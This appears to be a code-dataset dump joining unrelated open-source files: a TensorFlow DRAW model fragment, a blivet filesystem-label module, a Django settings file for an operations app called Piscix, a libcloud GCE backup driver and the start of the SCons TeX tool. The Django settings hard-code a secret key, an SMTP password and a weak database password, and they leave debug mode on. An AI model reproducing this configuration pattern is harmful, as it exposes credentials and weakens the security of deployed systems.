with tf.variable_scope("encoder",reuse=self.share_parameters):
hidden_layer, next_state = self.lstm_enc(image, prev_state)
# map the RNN hidden state to latent variables
with tf.variable_scope("mu", reuse=self.share_parameters):
mu = dense(hidden_layer, self.n_hidden, self.n_z)
with tf.variable_scope("sigma", reuse=self.share_parameters):
logsigma = dense(hidden_layer, self.n_hidden, self.n_z)
sigma = tf.exp(logsigma)
return mu, logsigma, sigma, next_state
def sampleQ(self, mu, sigma):
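        # Reparameterization trick: z = mu + sigma * eps, with eps ~ N(0, 1) drawn once as
        # self.e, so the sample stays differentiable with respect to mu and sigma.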
return mu + sigma*self.e
def decode_layer(self, prev_state, latent):
# update decoder RNN with latent var
with tf.variable_scope("decoder", reuse=self.share_parameters):
hidden_layer, next_state = self.lstm_dec(latent, prev_state)
return hidden_layer, next_state
def write_basic(self, hidden_layer):
# map RNN hidden state to image
with tf.variable_scope("write", reuse=self.share_parameters):
decoded_image_portion = dense(hidden_layer, self.n_hidden, self.img_size**2)
return decoded_image_portion
def write_attention(self, hidden_layer):
with tf.variable_scope("writeW", reuse=self.share_parameters):
w = dense(hidden_layer, self.n_hidden, self.attention_n**2)
w = tf.reshape(w, [self.batch_size, self.attention_n, self.attention_n])
Fx, Fy, gamma = self.attn_window("write", hidden_layer)
Fyt = tf.transpose(Fy, perm=[0,2,1])
# [vert, attn_n] * [attn_n, attn_n] * [attn_n, horiz]
wr = tf.batch_matmul(Fyt, tf.batch_matmul(w, Fx))
wr = tf.reshape(wr, [self.batch_size, self.img_size**2])
return wr * tf.reshape(1.0/gamma, [-1, 1])
model = Draw()
model.train()
| mit | -2,412,362,508,978,403,000 | 44.923077 | 178 | 0.588463 | false |
alexanderlaw/blivet | blivet/tasks/fswritelabel.py | 4 | 3327 | # fswritelabel.py
# Filesystem label writing classes.
#
# Copyright (C) 2015 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Anne Mulhern <[email protected]>
import abc
from six import add_metaclass
from .. import util
from ..errors import FSWriteLabelError
from . import availability
from . import task
@add_metaclass(abc.ABCMeta)
class FSWriteLabel(task.BasicApplication):
""" An abstract class that represents writing a label for a filesystem. """
description = "write filesystem label"
args = abc.abstractproperty(doc="arguments for writing a label")
def __init__(self, an_fs):
""" Initializer.
:param FS an_fs: a filesystem object
"""
self.fs = an_fs
# IMPLEMENTATION methods
@property
def _setCommand(self):
"""Get the command to label the filesystem.
:return: the command
:rtype: list of str
"""
return [str(self.ext)] + self.args
def doTask(self):
error_msgs = self.availabilityErrors
if error_msgs:
raise FSWriteLabelError("\n".join(error_msgs))
rc = util.run_program(self._setCommand)
if rc:
raise FSWriteLabelError("label failed")
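# Each concrete class below pairs an external labeling tool (exposed through
# availability.*_APP) with the argument list that tool expects, e.g. [device, label]
# for the dos/ext2 variants.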
class DosFSWriteLabel(FSWriteLabel):
ext = availability.DOSFSLABEL_APP
@property
def args(self):
return [self.fs.device, self.fs.label]
class Ext2FSWriteLabel(FSWriteLabel):
ext = availability.E2LABEL_APP
@property
def args(self):
return [self.fs.device, self.fs.label]
class JFSWriteLabel(FSWriteLabel):
ext = availability.JFSTUNE_APP
@property
def args(self):
return ["-L", self.fs.label, self.fs.device]
class NTFSWriteLabel(FSWriteLabel):
ext = availability.NTFSLABEL_APP
@property
def args(self):
return [self.fs.device, self.fs.label]
class ReiserFSWriteLabel(FSWriteLabel):
ext = availability.REISERFSTUNE_APP
@property
def args(self):
return ["-l", self.fs.label, self.fs.device]
class XFSWriteLabel(FSWriteLabel):
ext = availability.XFSADMIN_APP
@property
def args(self):
return ["-L", self.fs.label if self.fs.label != "" else "--", self.fs.device]
class UnimplementedFSWriteLabel(task.UnimplementedTask):
def __init__(self, an_fs):
""" Initializer.
:param FS an_fs: a filesystem object
"""
self.fs = an_fs
| gpl-2.0 | -8,105,825,313,170,470,000 | 27.681034 | 85 | 0.680794 | false |
mariobp/piscix | Piscix/settings.py | 2 | 11496 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Django settings for Piscix project.
Generated by 'django-admin startproject' using Django 1.10.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'x940f1i%t_@^!-whnfh3=zvjm0=pfnv2)iqm=59r4li#qz)wmn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
'localhost'
]
# Application definition
INSTALLED_APPS = [
'exile_ui',
'informes.apps.InformesConfig',
'notificaciones',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'daterange_filter',
'supra',
'nested_admin',
'usuarios.apps.UsuariosConfig',
'mantenimiento.apps.MantenimientoConfig',
'actividades',
'reportes',
'sorl.thumbnail',
'fullcalendar',
'inventario',
'gestion_cartera.apps.GestionCarteraConfig',
'import_export',
'django_autocomplete',
'django_select2'
]
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_HOST_USER = '[email protected]'
EMAIL_HOST_PASSWORD = 'grwlbpmnvfxlofjz'
EXILE_UI = {
'site_title': 'Operaciones',
'site_header': 'Operaciones',
    'index_title': 'Software para la gestión de rondas operativas',
'media': {
'logo': {
'dashboard': '/media/piscix_logo/Icono-w-t.png',
'page': '/media/piscix_logo/Icono-200px.png',
'login': '/media/piscix_logo/Icono-s-t.png'
},
'icons': {
'usuarios': {
'icon': 'people',
'groups': [
'Maestros',
'Piscina',
'Parafiscales',
'Personal'
],
'models': {
'Arl': {'icon': 'security', 'group': 'Parafiscales'},
'AsignacionPiscinero': {'icon': 'assignment', 'group': 'Piscina'},
'Asistente': {'icon': 'account_box', 'group': 'Maestros'},
'Casa': {'icon': 'home', 'group': 'Personal'},
'Cliente': {'icon': 'account_circle', 'group': 'Maestros'},
'Eps': {'icon': 'local_hospital', 'group': 'Parafiscales'},
'Fabricante': {'icon': 'widgets', 'group': 'Piscina'},
'Gerente': {'icon': 'supervisor_account', 'group': 'Maestros'},
'NucleoFamiliar': {'icon': 'wc', 'group': 'Personal'},
'Parentesco': {'icon': 'people_outline', 'group': 'Personal'},
'Pariente': {'icon': 'child_friendly', 'group': 'Personal'},
'Pension': {'icon': 'nature_people', 'group': 'Parafiscales'},
'Periodicidad': {'icon': 'date_range', 'group': 'Piscina'},
'Piscina': {'icon': 'pool', 'group': 'Piscina'},
'Piscinero': {'icon': 'account_circle', 'group': 'Maestros'},
'Supervisor': {'icon': 'supervisor_account', 'group': 'Maestros'},
'Tipo_piscina': {'icon': 'settings', 'group': 'Piscina'}
}
},
'reportes': {
'icon': 'report',
'groups': [
'Fotos',
'Configuración',
'Reportes'
],
'models': {
'FotoReporte': {'icon': 'photo_library', 'group': 'Fotos'},
'Recordatorio': {'icon': 'today', 'group': 'Reportes'},
'Reporte': {'icon': 'report', 'group': 'Reportes'},
'TipoReporte': {'icon': 'settings', 'group': 'Configuración'},
'ReporteInformativo': {'icon': 'info', 'group': 'Reportes'}
}
},
'mantenimiento': {
'icon': 'build',
'groups': [
'Soluciones',
],
'models': {
'FotoSolucion': {'icon': 'photo_library', 'group': 'Soluciones'},
'Solucion': {'icon': 'build', 'group': 'Soluciones'},
}
},
'actividades': {
'icon': 'directions_walk',
'groups': [
'Actividades',
'Configuración'
],
'models': {
'Actividad': {'icon': 'event', 'group': 'Actividades'},
'PlanillaDiaria': {'icon': 'content_paste', 'group': 'Actividades'},
'TipoActividad': {'icon': 'settings', 'group': 'Configuración'}
},
'menu-extra': [
{'name': 'Calendario', 'url': '/notificaciones/schedule/',
'icon': 'event', 'group': 'Actividades'}
]
},
'auth': {
'icon': 'security',
'groups': [
'Seguridad',
],
'models': {
'Group': {'icon': 'people', 'group': 'Seguridad'},
'User': {'icon': 'person', 'group': 'Seguridad'}
}
},
'inventario': {
'icon': 'work',
'groups': [
'Inventario',
'Operaciones',
'Bodega',
'Informes'
],
'models': {
'Fabricante': {'icon': 'widgets', 'group': 'Inventario'},
'ArticuloInsumo': {'icon': 'description', 'group': 'Inventario'},
'Proveedor': {'icon': 'shopping_cart', 'group': 'Inventario'},
'Bodega': {'icon': 'store', 'group': 'Bodega'},
'Insumo': {'icon': 'layers', 'group': 'Inventario'},
'Entrada': {'icon': 'arrow_downward', 'group': 'Operaciones'},
'Salida': {'icon': 'arrow_upward', 'group': 'Operaciones'},
'SalidaDeBodega': {'icon': 'archive', 'group': 'Bodega'},
'Movimientos': {'icon': 'swap_horiz', 'group': 'Informes'},
'EntradaDeBodega': {'icon': 'unarchive', 'group': 'Bodega'},
}
},
'gestion_cartera': {
'icon': 'attach_money',
'groups': [
'Cartera',
],
'models': {
'Seguimiento': {'icon': 'contact_phone', 'group': 'Cartera'},
'InicioSeguimiento': {'icon': 'phone', 'group': 'Cartera'}
}
},
'logout': {
'icon': 'exit_to_app',
}
}
}
}
MENU_ORDER = [
{
'name': 'usuarios',
'models': [
'Arl',
'Eps',
'Pension',
'Casa',
'Parentesco',
'NucleoFamiliar',
'Fabricante',
'Periodicidad',
'Tipo_piscina',
'Piscina',
'AsignacionPiscinero',
'Cliente',
'Gerente',
'Asistente',
'Piscinero',
'Supervisor',
]
},
{
'name': 'reportes',
'models': [
'Reporte',
'FotoReporte',
'TipoReporte',
'Recordatorio',
'ReporteInformativo'
]
},
{
'name': 'mantenimiento',
'models': [
'Solucion',
'FotoSolucion',
]
},
{
'name': 'actividades',
'models': [
'Actividad',
'PlanillaDiaria',
'TipoActividad'
],
'menu-extra': [
'Calendario'
]
},
{
'name': 'auth',
'models': [
'Group',
'User'
]
},
{
'name': 'inventario',
'models': [
'Fabricante',
'ArticuloInsumo',
'Proveedor',
'Bodega',
'Insumo',
'Salida',
'Entrada',
'SalidaDeBodega',
'EntradaDeBodega',
'Movimientos'
]
},
{
'name': 'gestion_cartera',
'models': [
'Seguimiento',
'InicioSeguimiento'
]
},
{
'name': 'logout'
}
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'notificaciones.triggers.Middleware',
'Piscix.middleware.ThreadLocalMiddleware'
]
ROOT_URLCONF = 'Piscix.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Piscix.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'piscix_deploy',
'USER': 'piscix',
'PASSWORD': 'admin123456',
'HOST': 'localhost',
        'PORT': '5432'
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'es-CO'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
DATE_INPUT_FORMATS = [
'%m/%d/%Y',
]
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = '/var/www/Piscix/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = '/var/www/Piscix/media/'
| mit | -1,835,587,032,274,588,700 | 29.56117 | 91 | 0.485249 | false |
apache/libcloud | libcloud/backup/drivers/gce.py | 31 | 16808 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'GCEBackupDriver'
]
from libcloud.utils.iso8601 import parse_date
from libcloud.backup.base import BackupDriver, BackupTargetRecoveryPoint,\
BackupTargetJob, BackupTarget
from libcloud.backup.types import BackupTargetType, BackupTargetJobStatusType
from libcloud.common.google import GoogleResponse, GoogleBaseConnection
API_VERSION = 'v1'
DEFAULT_TASK_COMPLETION_TIMEOUT = 180
class GCEResponse(GoogleResponse):
pass
class GCEConnection(GoogleBaseConnection):
"""
Connection class for the GCE driver.
GCEConnection extends :class:`google.GoogleBaseConnection` for 2 reasons:
1. modify request_path for GCE URI.
2. Implement gce_params functionality described below.
If the parameter gce_params is set to a dict prior to calling request(),
the URL parameters will be updated to include those key/values FOR A
SINGLE REQUEST. If the response contains a nextPageToken,
gce_params['pageToken'] will be set to its value. This can be used to
implement paging in list:
>>> params, more_results = {'maxResults': 2}, True
>>> while more_results:
... driver.connection.gce_params=params
... driver.ex_list_urlmaps()
... more_results = 'pageToken' in params
...
[<GCEUrlMap id="..." name="cli-map">, <GCEUrlMap id="..." name="lc-map">]
[<GCEUrlMap id="..." name="web-map">]
"""
host = 'www.googleapis.com'
responseCls = GCEResponse
def __init__(self, user_id, key, secure, auth_type=None,
credential_file=None, project=None, **kwargs):
super(GCEConnection, self).__init__(user_id, key, secure=secure,
auth_type=auth_type,
credential_file=credential_file,
**kwargs)
self.request_path = '/compute/%s/projects/%s' % (API_VERSION,
project)
self.gce_params = None
def pre_connect_hook(self, params, headers):
"""
Update URL parameters with values from self.gce_params.
@inherits: :class:`GoogleBaseConnection.pre_connect_hook`
"""
params, headers = super(GCEConnection, self).pre_connect_hook(params,
headers)
if self.gce_params:
params.update(self.gce_params)
return params, headers
def request(self, *args, **kwargs):
"""
Perform request then do GCE-specific processing of URL params.
@inherits: :class:`GoogleBaseConnection.request`
"""
response = super(GCEConnection, self).request(*args, **kwargs)
# If gce_params has been set, then update the pageToken with the
# nextPageToken so it can be used in the next request.
if self.gce_params:
if 'nextPageToken' in response.object:
self.gce_params['pageToken'] = response.object['nextPageToken']
elif 'pageToken' in self.gce_params:
del self.gce_params['pageToken']
self.gce_params = None
return response
class GCEBackupDriver(BackupDriver):
name = 'Google Compute Engine Backup Driver'
website = 'http://cloud.google.com/'
connectionCls = GCEConnection
def __init__(self, user_id, key=None, project=None,
auth_type=None, scopes=None, credential_file=None, **kwargs):
"""
:param user_id: The email address (for service accounts) or Client ID
(for installed apps) to be used for authentication.
:type user_id: ``str``
:param key: The RSA Key (for service accounts) or file path containing
key or Client Secret (for installed apps) to be used for
authentication.
:type key: ``str``
:keyword project: Your GCE project name. (required)
:type project: ``str``
:keyword auth_type: Accepted values are "SA" or "IA" or "GCE"
("Service Account" or "Installed Application" or
"GCE" if libcloud is being used on a GCE instance
with service account enabled).
If not supplied, auth_type will be guessed based
on value of user_id or if the code is being
executed in a GCE instance.
:type auth_type: ``str``
:keyword scopes: List of authorization URLs. Default is empty and
grants read/write to Compute, Storage, DNS.
:type scopes: ``list``
:keyword credential_file: Path to file for caching authentication
information used by GCEConnection.
:type credential_file: ``str``
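
        Example (illustrative only; the service-account e-mail, key path and
        project name below are placeholders, not values defined by this
        driver)::

            driver = GCEBackupDriver(
                'sa-account@my-project.iam.gserviceaccount.com',
                key='/path/to/key.pem',
                project='my-project')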
"""
if not project:
raise ValueError('Project name must be specified using '
'"project" keyword.')
self.auth_type = auth_type
self.project = project
self.scopes = scopes
self.credential_file = credential_file or \
'~/.gce_libcloud_auth' + '.' + self.project
super(GCEBackupDriver, self).__init__(user_id, key, **kwargs)
# Cache Zone and Region information to reduce API calls and
# increase speed
self.base_path = '/compute/%s/projects/%s' % (API_VERSION,
self.project)
def get_supported_target_types(self):
"""
Get a list of backup target types this driver supports
:return: ``list`` of :class:``BackupTargetType``
"""
return [BackupTargetType.VOLUME]
def list_targets(self):
"""
List all backuptargets
:rtype: ``list`` of :class:`BackupTarget`
"""
raise NotImplementedError(
'list_targets not implemented for this driver')
def create_target(self, name, address,
type=BackupTargetType.VOLUME, extra=None):
"""
Creates a new backup target
:param name: Name of the target
:type name: ``str``
:param address: The volume ID.
:type address: ``str``
:param type: Backup target type (Physical, Virtual, ...).
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
# Does nothing since any volume can be snapped at anytime.
return self.ex_get_target_by_source(address)
def create_target_from_node(self, node, type=BackupTargetType.VIRTUAL,
extra=None):
"""
Creates a new backup target from an existing node
:param node: The Node to backup
:type node: ``Node``
:param type: Backup target type (Physical, Virtual, ...).
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
# Get the first persistent disk
disks = node.extra['disks']
if disks is not None:
return self.create_target(
name=node.name,
address=disks[0]['source'],
type=BackupTargetType.VOLUME,
extra=None)
else:
raise RuntimeError("Node does not have any block devices")
def create_target_from_container(self, container,
type=BackupTargetType.OBJECT,
extra=None):
"""
Creates a new backup target from an existing storage container
        :param container: The Container to backup
        :type container: ``Container``
:param type: Backup target type (Physical, Virtual, ...).
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
raise NotImplementedError(
'create_target_from_container not implemented for this driver')
def update_target(self, target, name, address, extra):
"""
Update the properties of a backup target
:param target: Backup target to update
:type target: Instance of :class:`BackupTarget`
:param name: Name of the target
:type name: ``str``
:param address: Hostname, FQDN, IP, file path etc.
:type address: ``str``
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
# Does nothing since any volume can be snapped at anytime.
return self.ex_get_target_by_source(address)
def delete_target(self, target):
"""
Delete a backup target
:param target: Backup target to delete
:type target: Instance of :class:`BackupTarget`
"""
raise NotImplementedError(
'delete_target not implemented for this driver')
def list_recovery_points(self, target, start_date=None, end_date=None):
"""
List the recovery points available for a target
        :param target: Backup target to list the recovery points for
:type target: Instance of :class:`BackupTarget`
:param start_date: The start date to show jobs between (optional)
:type start_date: :class:`datetime.datetime`
:param end_date: The end date to show jobs between (optional)
:type end_date: :class:`datetime.datetime``
:rtype: ``list`` of :class:`BackupTargetRecoveryPoint`
"""
request = '/global/snapshots'
response = self.connection.request(request, method='GET').object
return self._to_recovery_points(response, target)
def recover_target(self, target, recovery_point, path=None):
"""
Recover a backup target to a recovery point
        :param target: Backup target to recover
        :type target: Instance of :class:`BackupTarget`
        :param recovery_point: Recovery point to restore the target to
        :type recovery_point: Instance of :class:`BackupTargetRecoveryPoint`
:param path: The part of the recovery point to recover (optional)
:type path: ``str``
:rtype: Instance of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'recover_target not implemented for this driver')
def recover_target_out_of_place(self, target, recovery_point,
recovery_target, path=None):
"""
Recover a backup target to a recovery point out-of-place
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
        :param recovery_point: Recovery point holding the backup data
        :type recovery_point: Instance of :class:`BackupTargetRecoveryPoint`
        :param recovery_target: Backup target to recover the data to
:type recovery_target: Instance of :class:`BackupTarget`
:param path: The part of the recovery point to recover (optional)
:type path: ``str``
:rtype: Instance of :class:`BackupTargetJob`
"""
raise NotImplementedError(
'recover_target_out_of_place not implemented for this driver')
def get_target_job(self, target, id):
"""
Get a specific backup job by ID
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
        :param id: ID of the backup job to fetch
        :type id: ``str``
:rtype: :class:`BackupTargetJob`
"""
jobs = self.list_target_jobs(target)
return list(filter(lambda x: x.id == id, jobs))[0]
def list_target_jobs(self, target):
"""
List the backup jobs on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:rtype: ``list`` of :class:`BackupTargetJob`
"""
return []
def create_target_job(self, target, extra=None):
"""
Create a new backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTargetJob`
"""
name = target.name
request = '/zones/%s/disks/%s/createSnapshot' % (
target.extra['zone'].name, target.name)
snapshot_data = {
'source': target.extra['source']
}
self.connection.async_request(request, method='POST',
data=snapshot_data)
return self._to_job(self.ex_get_snapshot(name), target)
def resume_target_job(self, target, job):
"""
Resume a suspended backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param job: Backup target job to resume
:type job: Instance of :class:`BackupTargetJob`
:rtype: ``bool``
"""
raise NotImplementedError(
'resume_target_job not supported for this driver')
def suspend_target_job(self, target, job):
"""
Suspend a running backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param job: Backup target job to suspend
:type job: Instance of :class:`BackupTargetJob`
:rtype: ``bool``
"""
raise NotImplementedError(
'suspend_target_job not supported for this driver')
def cancel_target_job(self, target, job):
"""
Cancel a backup job on a target
:param target: Backup target with the backup data
:type target: Instance of :class:`BackupTarget`
:param job: Backup target job to cancel
:type job: Instance of :class:`BackupTargetJob`
:rtype: ``bool``
"""
raise NotImplementedError(
'cancel_target_job not supported for this driver')
def _to_recovery_points(self, data, target):
return [self._to_recovery_point(item, target)
for item in data.items]
def _to_recovery_point(self, item, target):
id = item.id
date = parse_date(item.creationTimestamp)
point = BackupTargetRecoveryPoint(
id=id,
date=date,
target=target,
driver=self.connection.driver,
extra={
'snapshot-id': id,
},
)
return point
def _to_jobs(self, data, target):
return [self._to_job(item, target)
for item in data.items]
def _to_job(self, item, target):
id = item.id
job = BackupTargetJob(
id=id,
status=BackupTargetJobStatusType.PENDING,
progress=0,
target=target,
driver=self.connection.driver,
extra={
},
)
return job
def ex_get_snapshot(self, name):
request = '/global/snapshots/%s' % (name)
response = self.connection.request(request, method='GET').object
return response
def ex_get_target_by_source(self, source):
return BackupTarget(
id=source,
name=source,
address=source,
type=BackupTargetType.VOLUME,
driver=self.connection.driver,
extra={
"source": source
}
)
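def _example_snapshot_workflow(driver, volume_link):  # pragma: no cover
    """Illustrative sketch, not part of the upstream driver: a minimal backup
    workflow built only from the API defined above. ``driver`` is assumed to be
    an already-authenticated GCEBackupDriver and ``volume_link`` the selfLink
    URL of an existing persistent disk; both names are placeholders.
    """
    # Any GCE disk can be snapshotted, so create_target simply wraps the volume.
    target = driver.create_target(name='example-target', address=volume_link)
    # Snapshot the disk; the returned BackupTargetJob starts in PENDING state.
    job = driver.create_target_job(target)
    # Snapshots visible to the project are exposed as recovery points.
    points = driver.list_recovery_points(target)
    return job, points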
| apache-2.0 | 3,948,166,087,562,766,000 | 34.16318 | 79 | 0.590612 | false |
Bforartists/scons | scons-local/SCons/Tool/tex.py | 3 | 40181 | """SCons.Tool.tex
Tool-specific initialization for TeX.
Generates .dvi files from .tex files
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/tex.py 2014/07/05 09:42:21 garyo"
import os.path
import re
import shutil
import sys
import platform
import glob
import SCons.Action
import SCons.Node
import SCons.Node.FS
import SCons.Util
import SCons.Scanner.LaTeX
Verbose = False
must_rerun_latex = True
# these are files that just need to be checked for changes and then rerun latex
check_suffixes = ['.toc', '.lof', '.lot', '.out', '.nav', '.snm']
# these are files that require bibtex or makeindex to be run when they change
all_suffixes = check_suffixes + ['.bbl', '.idx', '.nlo', '.glo', '.acn', '.bcf']
#
# regular expressions used to search for Latex features
# or outputs that require rerunning latex
#
# search for all .aux files opened by latex (recorded in the .fls file)
openout_aux_re = re.compile(r"OUTPUT *(.*\.aux)")
# search for all .bcf files opened by latex (recorded in the .fls file)
# for use by biber
openout_bcf_re = re.compile(r"OUTPUT *(.*\.bcf)")
#printindex_re = re.compile(r"^[^%]*\\printindex", re.MULTILINE)
#printnomenclature_re = re.compile(r"^[^%]*\\printnomenclature", re.MULTILINE)
#printglossary_re = re.compile(r"^[^%]*\\printglossary", re.MULTILINE)
# search to find rerun warnings
warning_rerun_str = '(^LaTeX Warning:.*Rerun)|(^Package \w+ Warning:.*Rerun)'
warning_rerun_re = re.compile(warning_rerun_str, re.MULTILINE)
# search to find citation rerun warnings
rerun_citations_str = "^LaTeX Warning:.*\n.*Rerun to get citations correct"
rerun_citations_re = re.compile(rerun_citations_str, re.MULTILINE)
# search to find undefined references or citations warnings
undefined_references_str = '(^LaTeX Warning:.*undefined references)|(^Package \w+ Warning:.*undefined citations)'
undefined_references_re = re.compile(undefined_references_str, re.MULTILINE)
# used by the emitter
auxfile_re = re.compile(r".", re.MULTILINE)
tableofcontents_re = re.compile(r"^[^%\n]*\\tableofcontents", re.MULTILINE)
makeindex_re = re.compile(r"^[^%\n]*\\makeindex", re.MULTILINE)
bibliography_re = re.compile(r"^[^%\n]*\\bibliography", re.MULTILINE)
bibunit_re = re.compile(r"^[^%\n]*\\begin\{bibunit\}", re.MULTILINE)
multibib_re = re.compile(r"^[^%\n]*\\newcites\{([^\}]*)\}", re.MULTILINE)
addbibresource_re = re.compile(r"^[^%\n]*\\(addbibresource|addglobalbib|addsectionbib)", re.MULTILINE)
listoffigures_re = re.compile(r"^[^%\n]*\\listoffigures", re.MULTILINE)
listoftables_re = re.compile(r"^[^%\n]*\\listoftables", re.MULTILINE)
hyperref_re = re.compile(r"^[^%\n]*\\usepackage.*\{hyperref\}", re.MULTILINE)
makenomenclature_re = re.compile(r"^[^%\n]*\\makenomenclature", re.MULTILINE)
makeglossary_re = re.compile(r"^[^%\n]*\\makeglossary", re.MULTILINE)
makeglossaries_re = re.compile(r"^[^%\n]*\\makeglossaries", re.MULTILINE)
makeacronyms_re = re.compile(r"^[^%\n]*\\makeglossaries", re.MULTILINE)
beamer_re = re.compile(r"^[^%\n]*\\documentclass\{beamer\}", re.MULTILINE)
regex = r'^[^%\n]*\\newglossary\s*\[([^\]]+)\]?\s*\{([^}]*)\}\s*\{([^}]*)\}\s*\{([^}]*)\}\s*\{([^}]*)\}'
newglossary_re = re.compile(regex, re.MULTILINE)
biblatex_re = re.compile(r"^[^%\n]*\\usepackage.*\{biblatex\}", re.MULTILINE)
newglossary_suffix = []
# search to find all files included by Latex
include_re = re.compile(r'^[^%\n]*\\(?:include|input){([^}]*)}', re.MULTILINE)
includeOnly_re = re.compile(r'^[^%\n]*\\(?:include){([^}]*)}', re.MULTILINE)
# search to find all graphics files included by Latex
includegraphics_re = re.compile(r'^[^%\n]*\\(?:includegraphics(?:\[[^\]]+\])?){([^}]*)}', re.MULTILINE)
# search to find all files opened by Latex (recorded in .log file)
openout_re = re.compile(r"OUTPUT *(.*)")
# list of graphics file extensions for TeX and LaTeX
TexGraphics = SCons.Scanner.LaTeX.TexGraphics
LatexGraphics = SCons.Scanner.LaTeX.LatexGraphics
# An Action sufficient to build any generic tex file.
TeXAction = None
